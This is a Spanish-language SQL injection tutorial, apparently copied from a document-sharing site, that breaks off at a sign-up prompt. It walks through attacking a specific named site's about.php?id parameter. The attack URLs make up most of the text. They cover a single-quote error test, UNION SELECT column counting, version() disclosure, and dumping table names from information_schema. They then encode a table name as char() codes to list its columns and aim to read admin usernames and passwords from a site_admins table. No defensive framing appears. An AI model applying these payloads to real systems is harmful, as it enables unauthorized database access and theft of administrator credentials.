Guia Inyeccion Sql
Ejemplo:
http://www.cobranet.org/about.php?id=1
Paso 2. Evaluamos quesea vulnerable colocando una comilla sencilla seguida del número que esta después del = o borrando el número y que quede solo la comilla.
Si no arroja un error de Mysql o SQL es vulnerablehttp://www.cobranet.org/about.php?id=1’
PASO 3. Ahora colocamos lo siguiente -1+unión+select+1…después del igual hasta que nos muestres en pantalla el número de las tablas que contiene, eneste caso solo tuvimos que llegar hasta el numero 6.
http://www.cobranet.org/about.php?id=-1+union+select+1,2,3,4,5,6
Paso 4. También podemos saber la versión colocando versión() donde vael numero de la tabla.
http://www.cobranet.org/about.php?id=-1+union+select+1,2,3,version(),5,6
Paso 5. Remplazamos ahora una columna por group_concat(table_name) y al final colocamos+from+information_schema.tables—
http://www.cobranet.org/about.php?id=-1+union+select+1,2,3,group_concat(table_name),5,6+from+information_schema.tables--
Paso 6. Ahora buscamos una tabla que nosde indicios de que contienene el password y el usuario.
PASO 7. Copiamos el nombre y lo vamos a convertir a ascii.
Paso 8. Ahora copiamos la conversión del nombre de la tabla y losespacios los cambiamos por comas.
115,105,116,101,95,97,100,109,105,110,115
Y los pegamos en la url de forma que quedaría asi:http://www.cobranet.org/about.php?id=-1+union+select+1,2,3,group_concat(column_name),5,6+from+information_schema.columns+where+table_name=char (115,105,116,101,95,97,100,109,105,110,115)
Paso 9. Ya tenemos algo mas interesante de como están nombrados elid, user, password ahora falta que podamos verlos.
Remplazamos esa información donde esta escrito column colocamos admin_id,admin_username,admin_password y al final +from+site_admins...
Regístrate para leer el documento completo.